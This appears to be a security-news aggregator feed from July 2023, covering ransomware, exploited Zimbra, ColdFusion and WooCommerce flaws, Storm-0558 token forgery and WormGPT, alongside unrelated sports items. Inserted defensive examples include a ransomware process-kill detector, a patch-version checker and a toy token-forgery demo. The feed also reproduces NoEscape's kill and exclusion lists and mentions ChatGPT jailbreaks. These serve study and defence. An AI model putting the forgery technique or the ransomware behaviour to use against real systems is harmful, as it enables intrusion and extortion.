                The cybercrime group FIN8 is using a revamped version of the Sardonic backdoor to deliver the BlackCat ransomware. The financially motivated group FIN8 (aka Syssphinx) was spotted using a revamped version of a backdoor tracked as Sardonic to deliver the BlackCat ransomware (aka Noberus ransomware). Sardonic is a sophisticated backdoor that supports a wide range of features that was designed […]

                The post FIN8 Group spotted delivering the BlackCat Ransomware appeared first on Security Affairs.

                "

                Autosummary: The backdoor supports multiple commands, such as dropping arbitrary files supplied by the attacker, exfiltrating the content of arbitrary files to the remote attacker, loading a DLL plugin supplied by the remote attacker, and executing shellcode supplied by the remote attacker. "


                Protect yourself from ticketing scams ahead of the Premier League Summer Series USA Tour

                financial
                2023-07-18 https://www.welivesecurity.com/2023/07/18/protect-yourself-ticketing-scams-premier-league-summer-series-usa-tour/

                There is a significant secondary marketplace where tickets can sell for several times their original value, opening the opportunity for scammers and fraud

                The post Protect yourself from ticketing scams ahead of the Premier League Summer Series USA Tour appeared first on WeLiveSecurity

                "

                Autosummary: Consider these tips if you want to catch one of the European matches this summer (of course, these tips also apply when snagging concert tickets or other events year-round): Purchase the ticket from the official website promoted by the teams, stadium or the official ticket website commonly used in your country. If you haven't scored a ticket at the time of public release, then the first major difference is that tickets can become available on secondary market websites, such as SeatGeek and StubHub, without any price restriction, whereas in most of Europe ticket resale is restricted and typically price locked to face value or close to it. "


                Growing scam activity linked to social media and automation

                financial
                2023-07-17 https://www.helpnetsecurity.com/2023/07/17/scam-resources-average-number/

                The average number of scam resources created per brand across all regions and industries more than doubled year-on-year in 2022, up 162%, according to Group-IB. Additionally, the total number of scam pages detected by Group-IB in 2022 was more than three times higher than in 2021. The so-called scamdemic is spreading rapidly. Surge in scam activity Experts at Group-IB noted both an increase in the number of scams as well as the number of people … More

                The post Growing scam activity linked to social media and automation appeared first on Help Net Security.

                "

                Autosummary: Over the past year, scammers have increasingly turned to social media to launch their campaigns, and in the APAC region, 76% of scams targeting companies in seven core sectors (financial institutions, banks, telecommunications and media, oil and gas, aviation, insurance, manufacturing) seen by Group-IB leveraged social media. In Europe, the average number of scam resources per brand in nine verticals (financial institutions, banks, video games, real estate, manufacturing, healthcare, transport and logistics, aviation) increased year-on-year by 74% in 2022. "


                CERT-UA Uncovers Gamaredon's Rapid Data Exfiltration Tactics Following Initial Compromise

                industry
                2023-07-17 https://thehackernews.com/2023/07/cert-ua-uncovers-gamaredons-rapid-data.html
                The Russia-linked threat actor known as Gamaredon has been observed conducting data exfiltration activities within an hour of the initial compromise. "As a vector of primary compromise, for the most part, emails and messages in messengers (Telegram, WhatsApp, Signal) are used, in most cases, using previously compromised accounts," the Computer Emergency Response Team of Ukraine (CERT-UA) said in "

                Autosummary: According to CERT-UA, GammaSteel is used to exfiltrate files matching a specific set of extensions – .doc, .docx, .xls, .xlsx, .rtf, .odt, .txt, .jpg, .jpeg, .pdf, .ps1, .rar, .zip, .7z, and .mdb "


                Growing a 15,000 strong automotive cybersecurity group with John Heldreth

                industry ciber
                2023-07-17 https://www.helpnetsecurity.com/2023/07/17/automotive-cybersecurity-john-heldreth/

                The fury with which the automotive community pried, prodded, and eventually outsmarted existing software-driven functions is nothing short of horrifying. While it seemed like automotive cybersecurity would never outpace these modern laptop-wielding gearheads, John Heldreth, Head of Car Security Operations at Volkswagen AG, had a different idea. Instead of trying to find solutions in a siloed manner, the automotive industry should have a place to collaborate, network, and take action against the rise … More

                The post Growing a 15,000 strong automotive cybersecurity group with John Heldreth appeared first on Help Net Security.

                "

                Autosummary: “For me this means bringing all of those different systems together into a centralized place where you can organize, identify by time or by product, by asset, and so on, so that you can understand the full picture,” said John. While it seemed like automotive cybersecurity would never outpace these modern laptop-wielding gearheads, John Heldreth, Head of Car Security Operations at Volkswagen AG, had a different idea. “What we’re trying to do, of course, is to reduce any risk to our customers,” said John. Instead of trying to find solutions in a siloed manner, the automotive industry should have a place to collaborate, network, and take action against the rise in cyber threats targeted at their vehicles. "


                Cybercriminals Exploit Microsoft Word Vulnerabilities to Deploy LokiBot Malware

                exploits ciber
                2023-07-17 https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html
                Microsoft Word documents exploiting known remote code execution flaws are being used as phishing lures to drop malware called LokiBot on compromised systems. "LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin said. "It primarily targets Windows systems and aims to gather sensitive information from "

                Autosummary: "LokiBot, also known as Loki PWS, has been a well-known information-stealing Trojan active since 2015," Fortinet FortiGuard Labs researcher Cara Lin said. "


                Lionel Messi: Inter Miami unveil Argentina forward to sold-out crowd

                latam
                2023-07-17 https://www.bbc.co.uk/sport/football/66219125?at_medium=RSS&at_campaign=KARANGA
                Inter Miami unveil Lionel Messi as their new number 10 in front of a sold-out crowd in Fort Lauderdale. "

                Autosummary: Don Garber, commissioner of Major League Soccer, said someone of Messi's status choosing to play in the league was a "transformational moment", and he hoped the signing would "shout to the world that this is a soccer nation". "A lot of naysayers and doubters, but Miami was able to make it happen." Inter Miami fans who could not get a ticket to the event, which was dubbed "The Unveil", waited for Messi after the show to try to catch a glimpse of the Argentina legend. The arrival of Messi in the US has been met with feverish anticipation by the fans of Inter Miami, who only started playing in the Eastern Conference of the MLS in 2020. In a brief address in Spanish, Messi, 36, thanked supporters and said he had the "same desire" he always has. "


                JumpCloud discloses breach by state-backed APT hacking group

                government
                2023-07-17 https://www.bleepingcomputer.com/news/security/jumpcloud-discloses-breach-by-state-backed-apt-hacking-group/
                US-based enterprise software firm JumpCloud says a state-backed hacking group breached its systems almost one month ago as part of a highly targeted attack focused on a limited set of customers. [...] "

                Autosummary: "


                Critical XSS vulnerability in Zimbra exploited in the wild (CVE-2023-34192)

                exploits
                2023-07-17 https://www.helpnetsecurity.com/2023/07/17/cve-2023-34192/

                A critical cross site scripting (XSS) vulnerability (CVE-2023-34192) in the popular open source email collaboration suite Zimbra is being exploited by attackers. CVE-2023-34192 could allow a remote authenticated threat actor to execute arbitrary code through a crafted script submitted to the /h/autoSaveDraft function. It affects Zimbra Collaboration Suite (ZCS) v8.8.15. The company has provided admins with instructions on how to apply the fix manually, by editing a single file. “This vulnerability has … More

                The post Critical XSS vulnerability in Zimbra exploited in the wild (CVE-2023-34192) appeared first on Help Net Security.

                "

                Autosummary: Vulnerabilities – zero-days or not – in ZCS are often exploited by attackers, since Zimbra is widely used by a variety of organizations, including government agencies, universities, companies, etc. "


                Hackers Exploit WebAPK to Deceive Android Users into Installing Malicious Apps

                exploits
                2023-07-17 https://thehackernews.com/2023/07/hackers-exploit-webapk-to-deceive.html
                Threat actors are taking advantage of Android's WebAPK technology to trick unsuspecting users into installing malicious web apps on Android phones that are designed to capture sensitive personal information. "The attack began with victims receiving SMS messages suggesting the need to update a mobile banking application," researchers from CSIRT KNF said in an analysis released last week. "The "

                Autosummary: "Cybercriminals use these tools to access compromised accounts and impersonate legitimate customers by exploiting stolen cookie files, impersonating hyper-granular device identifiers, and utilizing fraud victims' unique network settings," the cybersecurity company said. "


                Malicious USB Drives Targeting Global Targets with SOGU and SNOWYDRIVE Malware

                exploits
                2023-07-17 https://thehackernews.com/2023/07/malicious-usb-drives-targetinging.html
                Cyber attacks using infected USB drives as an initial access vector have witnessed a three-fold increase in the first half of 2023. That's according to new findings from Mandiant, which detailed two such campaigns – SOGU and SNOWYDRIVE – targeting both public and private sector entities across the world. SOGU is the "most prevalent USB-based cyber espionage attack using USB flash "

                Autosummary: Targets include construction and engineering, business services, government, health, transportation, and retail in Europe, Asia, and the U.S. The infection chain detailed by Mandiant exhibits tactical commonalities with another Mustang Panda campaign uncovered by Check Point, which took the wraps off a strain of self-propagating malware called WispRider that spreads through compromised USB drives and can potentially breach air-gapped systems. "


                Adobe warns of critical ColdFusion RCE bug exploited in attacks

                exploits
                2023-07-17 https://www.bleepingcomputer.com/news/security/adobe-warns-of-critical-coldfusion-rce-bug-exploited-in-attacks/
                Adobe warns that a critical ColdFusion pre-authentication remote code execution vulnerability tracked as CVE-2023-29300 is actively exploited in attacks. [...] "

                Autosummary: While the details of how the vulnerability is exploited are currently unknown, a technical blog post by Project Discovery, published last week and since removed, contained a proof-of-concept exploit for CVE-2023-29300. "


                IT worker jailed for impersonating ransomware gang to extort employer

                exploits ransomware
                2023-07-17 https://www.bleepingcomputer.com/news/security/it-worker-jailed-for-impersonating-ransomware-gang-to-extort-employer/
                28-year-old Ashley Liles, a former IT employee, has been sentenced to over three years in prison for attempting to blackmail his employer during a ransomware attack. [...] "

                Autosummary: "


                Meet NoEscape: Avaddon ransomware gang's likely successor

                exploits ransomware
                2023-07-17 https://www.bleepingcomputer.com/news/security/meet-noescape-avaddon-ransomware-gangs-likely-successor/
                The new NoEscape ransomware operation is believed to be a rebrand of Avaddon, a ransomware gang that shut down and released its decryption keys in 2021. [...] "

                Autosummary: NoEscape terminates the following processes: 360doctor, 360se, Culture, Defwatch, GDscan, MsDtSrvr, QBCFMonitorService, QBDBMgr, QBIDPService, QBW32, RAgui, RTVscan, agntsvc, agntsvcencsvc, agntsvcisqlplussvc, anvir, anvir64, apache, axlbridge, backup, ccleaner, ccleaner64, dbeng50, dbsnmp, encsvc, excel, far, fdhost, fdlauncher, httpd, infopath, isqlplussvc, java, kingdee, msaccess, msftesql, mspub, mydesktopqos, mydesktopservice, mysqld-nt, mysqld-opt, mysqld, ncsvc, ocautoupds, ocomm, ocssd, onedrive, onenote, oracle, outlook, powerpnt, procexp, qbupdate, sqbcoreservice, sql, sqlagent, sqlbrowser, sqlmangr, sqlserver, sqlservr, sqlwriter, steam, supervise, synctime, taskkill, tasklist, tbirdconfig, thebat, thunderbird, tomcat, tomcat6, u8, ufida, visio, wdswfsafe, winword, wordpad, wuauclt, wxServer, wxServerView, and xfssvccon. The ransomware terminates these applications to unlock files that may be open and therefore prevented from being encrypted. It will also stop the following Windows services associated with databases, QuickBooks, security software, and virtual machine platforms: Culserver, DefWatch, GxBlr, GxCIMgr, GxCVD, GxFWD, GxVss, QBCFMonitorService, QBIDPService, RTVscan, SavRoam, VMAuthdService, VMUSBArbService, VMnetDHCP, VMwareHostd, backup, ccEvtMgr, ccSetMgr, dbeng8, dbsrv12, memtas, mepocs, msexchange, msmdsrv, sophos, sql, sqladhlp, sqlagent, sqlbrowser, sqlservr, sqlwriter, svc$, tomcat6, veeam, vmware-converter, vmware-usbarbitator64, and vss. When encrypting files, the encryptor will skip all files that have the following file extensions: exe, bat, bin, cmd, com, cpl, dat, dll, drv, hta, ini, lnk, lock, log, mod, msc, msi, msp, pif, prf, rdp, scr, shs, swp, sys, theme. It will also skip files in folders whose names contain the following strings: $recycle.bin, $windows.~bt, $windows.~ws, %PROGRAMFILES(x86)%, %PUBLIC%, %ProgramData%, %SYSTEMDRIVE%\Program Files, %SYSTEMDRIVE%\Users\All Users, %SYSTEMDRIVE%\Windows, %TMP%, %USERPROFILE%\AppData, AppData, %AppData%, EFI, Intel, MSOCache, Mozilla, Program Files, ProgramData, Tor Browser, Windows, WINDOWS, boot, google, perflogs, system volume information, windows.old. During encryption, Gillespie told BleepingComputer that it could be configured to use three modes: Full - the entire file is encrypted; Partial - only the first X megabytes are encrypted. "
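The process and service kill lists above are a usable detection signal: on a healthy host, many of those processes rarely exit within seconds of each other. The script below is an added example, not from the article or the NoEscape analysis it summarises; it scans constructed stand-ins for Sysmon Event ID 5 ("Process terminated") records and raises one alert per host when at least five distinct watch-listed processes terminate inside a 60-second window. The watch list is a subset of the names quoted above; the one-line-per-event log format, host names, paths and timestamps are constructed for this example.

```python
"""Hunt for a ransomware pre-encryption tell: a burst of terminations of the
processes NoEscape is reported to kill before it encrypts.

Added example, not from the article or the NoEscape analysis. The watch list
is a subset of the process names quoted above; the one-line-per-event format,
host names, paths and timestamps are constructed (stand-ins for Sysmon
Event ID 5, "Process terminated").
"""
from collections import deque
from datetime import datetime, timezone
import ntpath

# Subset of the process names the article says NoEscape terminates
# (compared case-insensitively, without the .exe suffix).
NOESCAPE_TARGETS = {
    "sqlservr", "sqlwriter", "sqlagent", "sqlbrowser", "mysqld", "oracle",
    "ocssd", "dbeng50", "msaccess", "excel", "winword", "powerpnt", "outlook",
    "onenote", "onedrive", "thunderbird", "thebat", "ccleaner", "procexp",
    "tomcat", "httpd", "apache", "java", "steam", "taskkill", "tasklist",
}

# Constructed events: "<utc time> <host> <event id> <image path>". fs01 shows
# the burst; ws22 shows two legitimate closes more than an hour apart.
SAMPLE_LOG = """\
2023-07-17T10:00:00Z fs01 5 C:\\Windows\\explorer.exe
2023-07-17T10:00:01Z fs01 5 C:\\Program Files\\Microsoft SQL Server\\MSSQL15\\MSSQL\\Binn\\sqlservr.exe
2023-07-17T10:00:01Z fs01 5 C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\sqlwriter.exe
2023-07-17T10:00:02Z fs01 5 C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE
2023-07-17T10:00:02Z fs01 5 C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE
2023-07-17T10:00:03Z fs01 5 C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe
2023-07-17T10:00:03Z fs01 5 C:\\Program Files\\Mozilla Thunderbird\\thunderbird.exe
2023-07-17T10:00:04Z fs01 5 C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe
2023-07-17T10:05:00Z ws22 5 C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE
2023-07-17T11:30:00Z ws22 5 C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE
"""


def parse_event(line):
    """Split one constructed log line; the image path may contain spaces."""
    timestamp, host, event_id, image = line.split(" ", 3)
    when = datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    name = ntpath.basename(image).lower()
    if name.endswith(".exe"):
        name = name[:-4]
    return {"time": when, "host": host, "event_id": int(event_id), "proc": name}


def find_termination_bursts(log_text, window_seconds=60, threshold=5):
    """Return one alert per host on which at least `threshold` distinct
    watch-listed processes terminated within any `window_seconds` window.
    Distinct names are counted, not raw events, so one service crash-looping
    does not trip the rule."""
    recent = {}                 # host -> deque of (time, proc) inside the window
    alerts, alerted = [], set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev["event_id"] != 5 or ev["proc"] not in NOESCAPE_TARGETS:
            continue
        window = recent.setdefault(ev["host"], deque())
        window.append((ev["time"], ev["proc"]))
        while (ev["time"] - window[0][0]).total_seconds() > window_seconds:
            window.popleft()
        distinct = sorted({proc for _, proc in window})
        if len(distinct) >= threshold and ev["host"] not in alerted:
            alerted.add(ev["host"])
            alerts.append({"host": ev["host"], "first_seen": window[0][0],
                           "last_seen": ev["time"], "processes": distinct})
    return alerts


if __name__ == "__main__":
    for alert in find_termination_bursts(SAMPLE_LOG):
        print(alert["host"], alert["first_seen"].isoformat(), alert["processes"])
```

Tune the threshold and window against a baseline from your own fleet before alerting on it, and pair the rule with the service list above (Service Control Manager event 7036, "entered the stopped state") to cover the second half of the behaviour.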


                Hackers exploiting critical WordPress WooCommerce Payments bug

                exploits
                2023-07-17 https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/
                Hackers are conducting widespread exploitation of a critical WooCommerce Payments plugin flaw to gain the privileges of any user, including administrators, on vulnerable WordPress installations. [...] "

                Autosummary: The flaw affects WooCommerce Payments plugin versions 4.8.0 and higher; it is fixed in versions 4.8.2, 4.9.1, 5.0.4, 5.1.3, 5.2.2, 5.3.1, 5.4.1, 5.5.2, 5.6.2, and later. "
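The fixed-version list is per minor branch, which is where ad-hoc version checks go wrong: 4.9.0 is newer than 4.8.2 but still vulnerable, and 4.8.2 is older than 5.6.2 but fixed. The following is an added example, not WooCommerce, Automattic or Wordfence code, that classifies an installed version by comparing it only against the first fixed release of its own branch. The affected floor (4.8.0) and the fixed releases are the ones listed above; the site inventory in demo() is constructed, and treating branches newer than 5.6 as fixed follows from the "and later" in the advisory.

```python
"""Branch-aware vulnerable/fixed classification for WooCommerce Payments.

Added example, not code from WooCommerce, Automattic or Wordfence. The
affected floor and the fixed releases come from the article; the site
inventory in demo() is constructed.
"""

FIRST_AFFECTED = (4, 8, 0)
# First fixed release on each maintained minor branch, as listed above.
FIXED_BY_BRANCH = {
    (4, 8): (4, 8, 2), (4, 9): (4, 9, 1), (5, 0): (5, 0, 4), (5, 1): (5, 1, 3),
    (5, 2): (5, 2, 2), (5, 3): (5, 3, 1), (5, 4): (5, 4, 1), (5, 5): (5, 5, 2),
    (5, 6): (5, 6, 2),
}
NEWEST_FIXED_RELEASE = max(FIXED_BY_BRANCH.values())   # (5, 6, 2)
NEWEST_PATCHED_BRANCH = max(FIXED_BY_BRANCH)           # (5, 6)


def parse_version(text):
    """'5.6.1' -> (5, 6, 1); reject anything that is not three integers."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected WooCommerce Payments version: {text!r}")
    return tuple(int(p) for p in parts)


def naive_is_vulnerable(text):
    """The tempting one-liner, 'older than the newest fixed release'. It
    over-reports: the patched 4.8.2 and 5.0.4 and the never-affected 4.7.x
    all come out as vulnerable."""
    return parse_version(text) < NEWEST_FIXED_RELEASE


def is_vulnerable(text):
    """Compare within the installed minor branch. A branch is fixed only from
    its own first fixed release, so 4.9.0 is vulnerable although it is newer
    than 4.8.2, and 4.8.2 is fixed although it is older than 5.6.2."""
    version = parse_version(text)
    if version < FIRST_AFFECTED:
        return False                      # pre-4.8.0 never had the bug
    branch = version[:2]
    fixed = FIXED_BY_BRANCH.get(branch)
    if fixed is None:
        if branch > NEWEST_PATCHED_BRANCH:
            return False                  # 5.7 and later shipped after the fix
        raise ValueError(f"branch {branch} is not covered by the advisory")
    return version < fixed


def triage(inventory):
    """inventory: {site: version} -> {site: 'vulnerable'|'fixed'|'not affected'}."""
    verdicts = {}
    for site, version in inventory.items():
        if parse_version(version) < FIRST_AFFECTED:
            verdicts[site] = "not affected"
        else:
            verdicts[site] = "vulnerable" if is_vulnerable(version) else "fixed"
    return verdicts


def demo():
    """Run triage over a constructed inventory of sites (assumed data)."""
    inventory = {
        "shop-a.example": "4.8.1", "shop-b.example": "4.8.2",
        "shop-c.example": "4.9.0", "shop-d.example": "5.0.4",
        "shop-e.example": "5.6.1", "shop-f.example": "5.7.0",
        "shop-g.example": "4.7.9",
    }
    return triage(inventory)


if __name__ == "__main__":
    for site, verdict in demo().items():
        print(f"{site:16} {verdict}")
```

The version string to feed in is the one WordPress reports for the plugin (the `Version:` header of the plugin's main file or the plugins screen); if the value has a fourth component or a suffix, inspect it by hand rather than loosening parse_version().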


                Adobe warns customers of a critical ColdFusion RCE exploited in attacks

                exploits
                2023-07-17 https://securityaffairs.com/148542/hacking/coldfusion-rce-attacks.html

                Adobe is warning customers of a critical ColdFusion pre-authentication RCE bug, tracked as CVE-2023-29300, which is actively exploited. Adobe warns customers of a critical ColdFusion pre-authentication remote code execution vulnerability, tracked as CVE-2023-29300 (CVSS score 9.8), that is actively exploited in attacks in the wild. “Adobe is aware that CVE-2023-29300 has been exploited in the […]

                The post Adobe warns customers of a critical ColdFusion RCE exploited in attacks appeared first on Security Affairs.

                "

                Autosummary: "


                Critical ColdFusion flaws exploited in attacks to drop webshells

                exploits
                2023-07-17 https://www.bleepingcomputer.com/news/security/critical-coldfusion-flaws-exploited-in-attacks-to-drop-webshells/
                Hackers are actively exploiting two ColdFusion vulnerabilities to bypass authentication and remotely execute commands to install webshells on vulnerable servers. [...] "

                Autosummary: On July 11, Adobe disclosed a ColdFusion authentication bypass tracked as CVE-2023-29298, discovered by Rapid7 researcher Stephen Fewer, and a pre-auth RCE vulnerability tracked as CVE-2023-29300, discovered by CrowdStrike researcher Nicolas Zilio. While CVE-2023-29300 appears to be fixed, Rapid7 says it has discovered that the fix for CVE-2023-29298 can still be bypassed, so another patch from Adobe should be expected soon. Adobe recommends that admins "lockdown" ColdFusion installations to increase security and offer better defense against attacks. "


                Act now! In-the-wild Zimbra vulnerability needs a workaround

                exploits
                2023-07-17 https://www.malwarebytes.com/blog/news/2023/07/act-now-unpatched-zimbra-vulnerability-is-actively-exploited

                Categories: Exploits and vulnerabilities

                Categories: News

                Tags: Zimbra

                Tags: MalasLocker

                Tags: vulnerability

                Tags: Google

                Tags: actively exploited

                Tags: fn:escapeXml

                Security experts are warning Zimbra users that a vulnerability for which there is no patch is being actively exploited in the wild.

                (Read more...)

                The post Act now! In-the-wild Zimbra vulnerability needs a workaround appeared first on Malwarebytes Labs.

                "

                Autosummary: Mitigation: The Zimbra security update suggests you apply the following fix manually on all of your mailbox nodes. Take a backup of the file /opt/zimbra/jetty/webapps/zimbra/m/momoveto. Then open the active file for editing and go to line number 40. Change <input name="st" type="hidden" value="${param.st}"/> to <input name="st" type="hidden" value="${fn:escapeXml(param.st)}"/>. Zimbra notes that a service restart is not required, so you can do it without any downtime. "


                Dartford man convicted of the murder of his girlfriend in Peru

                latam
                2023-07-17 https://www.bbc.co.uk/news/uk-england-kent-66222802?at_medium=RSS&at_campaign=KARANGA
                Jorge Garay strangled and buried his partner Karla Godoy while on holiday in Lima, a jury decides. "

                Autosummary: "


                Week in review: Malware delivery via Microsoft Teams, law firms under cyberattack, CVSS 4.0 is out

                exploits ciber
                2023-07-16 https://www.helpnetsecurity.com/2023/07/16/week-in-review-malware-delivery-via-microsoft-teams-law-firms-under-cyberattack-cvss-4-0-is-out/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: CISO perspective on why boards don’t fully grasp cyber attack risks In this Help Net Security interview, David Christensen, CISO of PlanSource, proposes strategies to understand and acknowledge the broader organizational and strategic implications of cybersecurity risk management, strategy, and governance. How Google Cloud’s AML AI redefines the fight against money laundering In this Help Net Security interview, Anna Knizhnik, … More

                The post Week in review: Malware delivery via Microsoft Teams, law firms under cyberattack, CVSS 4.0 is out appeared first on Help Net Security.

                "

                Autosummary: How Google Cloud’s AML AI redefines the fight against money laundering In this Help Net Security interview, Anna Knizhnik, Director, Product Management, Cloud AI, Financial Services, at Google Cloud, explains how Google Cloud’s AML AI outperforms current systems, lowers operational costs, enhances governance, and improves the customer experience by reducing false positives and minimizing compliance verification checks. "


                Microsoft Bug Allowed Hackers to Breach Over Two Dozen Organizations via Forged Azure AD Tokens

                exploits
                2023-07-15 https://thehackernews.com/2023/07/microsoft-bug-allowed-hackers-to-breach.html
                Microsoft on Friday said a validation error in its source code allowed for Azure Active Directory (Azure AD) tokens to be forged by a malicious actor known as Storm-0558 using a Microsoft account (MSA) consumer signing key to breach two dozen organizations. "Storm-0558 acquired an inactive MSA consumer signing key and used it to forge authentication tokens for Azure AD enterprise and MSA "

                Autosummary: Microsoft said since the discovery of the campaign on June 16, 2023, it has "identified the root cause, established durable tracking of the campaign, disrupted malicious activities, hardened the environment, notified every impacted customer, and coordinated with multiple government entities." "
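The root cause reported above is a validation error: a consumer (MSA) signing key was accepted as the signer of enterprise (Azure AD) tokens. The following is an added, illustrative example and not Microsoft's code; it uses HMAC-signed toy tokens rather than the real token formats, and the issuer URLs, key ids and key bytes are constructed. It shows the same class of mistake, resolving a token's key id against every key the service knows, next to the scoped lookup that confines the search to the key set of the issuer the relying party is configured to trust.

```python
"""Issuer-scoped signing-key lookup, the check whose absence the article
describes.

Added, illustrative example: HMAC-signed toy tokens, not Microsoft code and
not the real Azure AD or MSA token formats. Issuer URLs, key ids and key
bytes are constructed for this example.
"""
import base64
import hashlib
import hmac
import json

CONSUMER_ISSUER = "https://login.live.com"                       # MSA (consumer)
ENTERPRISE_ISSUER = "https://login.microsoftonline.com/contoso"  # Azure AD tenant

# Separate key sets per issuer; in the real systems the consumer and
# enterprise keys are published by different endpoints.
KEY_SETS = {
    CONSUMER_ISSUER: {"msa-consumer-2016": b"constructed-consumer-key"},
    ENTERPRISE_ISSUER: {"aad-enterprise-2023": b"constructed-enterprise-key"},
}


def _b64u(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64u(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _mac(key, signing_input):
    return hmac.new(key, signing_input.encode(), hashlib.sha256).digest()


def sign_token(kid, key, claims):
    """Mint header.payload.signature with the given key. The issuer is whatever
    the caller puts in the claims, which is exactly a forger's freedom."""
    header = _b64u(json.dumps({"alg": "HS256", "kid": kid}).encode())
    payload = _b64u(json.dumps(claims).encode())
    signing_input = f"{header}.{payload}"
    return f"{signing_input}.{_b64u(_mac(key, signing_input))}"


def _split(token):
    header, payload, signature = token.split(".")
    return (json.loads(_unb64u(header)), json.loads(_unb64u(payload)),
            _unb64u(signature), f"{header}.{payload}")


def verify_flawed(token, expected_issuer, expected_audience):
    """Resolves the kid against every key the service knows, so any valid key,
    consumer keys included, can sign a token for any issuer."""
    header, claims, signature, signing_input = _split(token)
    every_key = {kid: key for keys in KEY_SETS.values() for kid, key in keys.items()}
    key = every_key.get(header.get("kid"))
    if key is None or not hmac.compare_digest(signature, _mac(key, signing_input)):
        return False
    return claims.get("iss") == expected_issuer and claims.get("aud") == expected_audience


def verify_scoped(token, expected_issuer, expected_audience):
    """Resolves the kid only inside the key set of the issuer the relying party
    expects. The key set comes from configuration, never from the token's own
    iss claim, which the forger controls."""
    header, claims, signature, signing_input = _split(token)
    key = KEY_SETS.get(expected_issuer, {}).get(header.get("kid"))
    if key is None or not hmac.compare_digest(signature, _mac(key, signing_input)):
        return False
    return claims.get("iss") == expected_issuer and claims.get("aud") == expected_audience


def demo():
    """Forge an enterprise token with the consumer key and run both verifiers."""
    aud = "https://outlook.office.com"
    claims = {"iss": ENTERPRISE_ISSUER, "aud": aud, "upn": "cfo@contoso.example"}
    forged = sign_token("msa-consumer-2016",
                        KEY_SETS[CONSUMER_ISSUER]["msa-consumer-2016"], claims)
    legit = sign_token("aad-enterprise-2023",
                       KEY_SETS[ENTERPRISE_ISSUER]["aad-enterprise-2023"], claims)
    return {
        "flawed_accepts_forged": verify_flawed(forged, ENTERPRISE_ISSUER, aud),
        "scoped_accepts_forged": verify_scoped(forged, ENTERPRISE_ISSUER, aud),
        "flawed_accepts_legit": verify_flawed(legit, ENTERPRISE_ISSUER, aud),
        "scoped_accepts_legit": verify_scoped(legit, ENTERPRISE_ISSUER, aud),
    }


if __name__ == "__main__":
    print(demo())
```

The order of checks matters: whoever holds any signing key can write any issuer and audience into the claims, so the claims are only meaningful once the signature has verified under a key that belongs to the expected issuer, which is why verify_scoped() picks the key set before it reads a single claim.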


                WormGPT: New AI Tool Allows Cybercriminals to Launch Sophisticated Cyber Attacks

                ciber
                2023-07-15 https://thehackernews.com/2023/07/wormgpt-new-ai-tool-allows.html
                With generative artificial intelligence (AI) becoming all the rage these days, it's perhaps not surprising that the technology has been repurposed by malicious actors to their own advantage, enabling avenues for accelerated cybercrime. According to findings from SlashNext, a new generative AI cybercrime tool called WormGPT has been advertised on underground forums as a way for adversaries to "

                Autosummary: Making matters worse, threat actors are promoting "jailbreaks" for ChatGPT, engineering specialized prompts and inputs that are designed to manipulate the tool into generating output that could involve disclosing sensitive information, producing inappropriate content, and executing harmful code. "


                Lionel Messi: Inter Miami sign Argentina forward until 2025

                latam
                2023-07-15 https://www.bbc.co.uk/sport/football/66213439?at_medium=RSS&at_campaign=KARANGA
                Argentina forward Lionel Messi signs for American MLS side Inter Miami on a deal that runs until 2025. "

                Autosummary: On securing the services of a player expected to win another Ballon d'Or this year, Beckham said: "10 years ago, when I started my journey to build a new team in Miami, I said that I dreamed of bringing the greatest players in the world to this amazing city. "


                Shutterfly says Clop ransomware attack did not impact customer data

                exploits ransomware
                2023-07-14 https://www.bleepingcomputer.com/news/security/shutterfly-says-clop-ransomware-attack-did-not-impact-customer-data/
                Shutterfly, an online retail and photography manufacturing platform, is among the latest victims hit by Clop ransomware. Over the last few months, the Clop ransomware gang has been exploiting a vulnerability in the MOVEit Transfer utility to breach hundreds of companies, steal their data, and attempt to extort them. [...] "

                Autosummary: Other organizations that have already disclosed MOVEit Transfer breaches include Zellis (and its customers BBC, Boots, Aer Lingus, and Ireland's HSE), Ofcom, the government of Nova Scotia, the US state of Missouri, the US state of Illinois, the University of Rochester, the American Board of Internal Medicine, BORN Ontario, SOVOS "


                AVrecon malware infects 70,000 Linux routers to build botnet

                exploits
                2023-07-14 https://www.bleepingcomputer.com/news/security/avrecon-malware-infects-70-000-linux-routers-to-build-botnet/
                Since at least May 2021, stealthy Linux malware called AVrecon has been used to infect over 70,000 Linux-based small office/home office (SOHO) routers, pulling them into a botnet designed to steal bandwidth and provide a hidden residential proxy service. [...] "

                Autosummary: The Volt Typhoon Chinese cyberespionage group used a similar tactic to build a covert proxy network out of hacked ASUS, Cisco, D-Link, Netgear, FatPipe, and Zyxel SOHO network equipment to hide their malicious activity within legitimate network traffic, according to a joint advisory published by Five Eyes cybersecurity agencies (including the FBI, NSA, and CISA) in May. "


                Zimbra Warns of Critical Zero-Day Flaw in Email Software Amid Active Exploitation

                exploits
                2023-07-14 https://thehackernews.com/2023/07/zimbra-warns-of-critical-zero-day-flaw.html
                Zimbra has warned of a critical zero-day security flaw in its email software that has come under active exploitation in the wild. "A security vulnerability in Zimbra Collaboration Suite Version 8.8.15 that could potentially impact the confidentiality and integrity of your data has surfaced," the company said in an advisory. It also said that the issue has been addressed and that it's expected to "

